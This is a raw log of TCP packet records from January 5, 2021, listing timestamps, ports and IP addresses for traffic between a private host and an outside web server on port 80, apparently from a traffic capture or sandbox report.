Jan 5, 2021 10:06:48.875447989 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.875622988 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.875622988 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.875650883 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.875725985 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.875883102 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.875965118 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.876084089 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.876194000 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.876275063 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.876554012 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.876585007 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.876713037 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.876724958 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.876729012 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.876775980 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.876800060 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.876919031 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.876998901 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.878490925 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.879590034 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.879612923 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.879678011 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.879759073 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.879784107 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.879807949 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.880017042 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.880040884 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.880053997 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.880235910 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.880279064 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.880394936 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.880495071 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.880518913 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.880537033 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.880673885 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.880721092 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.880740881 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.880918980 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.880940914 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.880956888 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.881155968 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.881187916 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.881221056 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.881366968 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.881407976 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.881431103 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.881586075 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.881609917 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.881655931 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.881788969 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.881829977 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.881836891 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.882050991 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.882081032 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.882189035 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.882268906 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.882291079 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.882422924 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.882493973 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.882519960 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.882608891 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.882700920 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.882761955 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.882812977 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.882957935 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.882994890 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.883034945 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.883172989 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.883235931 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.883301020 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.883398056 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.883455992 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.883554935 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.883647919 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.883671045 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.883714914 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.883764029 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.883835077 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.883960009 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.883963108 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.884087086 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.884143114 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.884319067 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.884341955 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.884499073 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.884530067 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.884561062 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.884650946 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.884754896 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.884800911 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.884870052 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.887845039 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.888041973 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.888070107 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.888144970 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.888302088 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.888333082 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.888501883 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.888528109 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.888731003 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.888761044 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.888946056 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.888972044 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.889162064 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.889184952 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.889411926 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.889436007 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.889600992 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.889632940 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.889851093 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.889874935 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.890085936 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.890109062 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.890206099 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.890326977 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.890393019 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.890522003 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.890642881 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.890908957 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.890934944 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.891144037 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.891166925 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.891326904 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.891369104 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.891622066 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.891644955 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.891665936 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.891815901 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.891880035 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.892002106 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.892122030 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.892250061 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.892400980 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.892432928 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.892685890 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.892708063 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.892918110 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.892940044 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.893174887 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.893194914 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.893421888 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.893445015 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.893465042 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.893467903 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.893491030 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.893718958 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.893737078 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.893868923 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.893953085 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.893969059 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.894180059 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.894196987 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.894393921 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.894428015 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.894637108 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.894653082 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.894830942 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.894874096 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.895071983 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.895088911 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.895318031 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.895334959 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.895555019 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.895577908 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.895610094 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.895772934 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.895797968 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.896030903 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.896048069 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.896245003 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.896280050 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.896604061 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.896620989 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.896660089 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.896699905 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.896720886 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.897020102 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.897039890 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.897222042 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.897238970 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.897372007 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.897378922 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.897397995 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.897418976 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.897458076 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.897619963 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.897638083 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.897802114 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.897819042 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.898058891 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.898076057 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.898078918 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.898083925 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.898252010 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.898268938 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.898494959 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.898510933 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.898736000 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.898760080 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.898853064 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.899009943 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.899233103 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.899255991 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.899465084 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.899517059 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.899697065 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.899714947 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.899893999 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.899920940 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.900141001 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.900161982 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.900548935 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.900580883 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.900599957 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.900615931 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.900794983 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.900830984 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.901053905 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.901068926 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.901271105 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.901288033 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.901643038 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.901664019 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.901721001 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.901740074 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.902014971 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.902045965 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.902183056 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.902199030 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.902462959 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.902508974 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.902534962 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.902626038 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.902848959 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.902864933 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.903093100 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.903111935 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.903482914 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.903537989 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.903557062 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.903573036 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.903631926 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.903642893 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.903645992 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.903667927 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.903717041 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.903719902 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.903770924 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.903856039 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.903872967 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.904038906 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.904097080 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.904191971 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.904319048 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.904441118 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.904541016 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.904758930 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.904822111 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.905040979 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.905081987 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.905236006 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.905252934 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.905411959 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.905524969 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.905594110 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.905714989 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.905833006 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.905914068 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.906033993 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.906114101 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.906233072 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.906308889 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.906325102 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.906436920 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.906469107 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.906606913 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.906759977 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.906795025 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.906917095 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.907139063 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.907176018 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.907392025 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.907411098 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.907601118 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.907617092 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.907844067 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.907860041 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.908081055 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.908097029 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.908195972 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.908315897 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.908421993 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.908488989 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.908638000 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.908756018 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.908876896 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.908958912 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.909076929 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.909199953 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.909285069 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.909403086 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.909560919 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.909641027 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.909882069 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.909904003 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.910151958 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.910172939 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.910336018 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.910360098 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.910553932 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.910579920 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.910792112 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.910809040 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.911014080 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.911030054 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.911246061 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.911262989 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.911464930 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.911483049 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.911669016 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.911760092 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.911923885 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.911941051 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.912120104 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.912158966 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.912367105 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.912456036 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.912478924 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.912600994 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.912703037 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.912844896 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.912956953 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.913161993 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.913201094 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.913290024 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.913441896 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.913489103 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.913722992 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.913758039 CET	80	49170	79.124.76.20	192.168.2.22
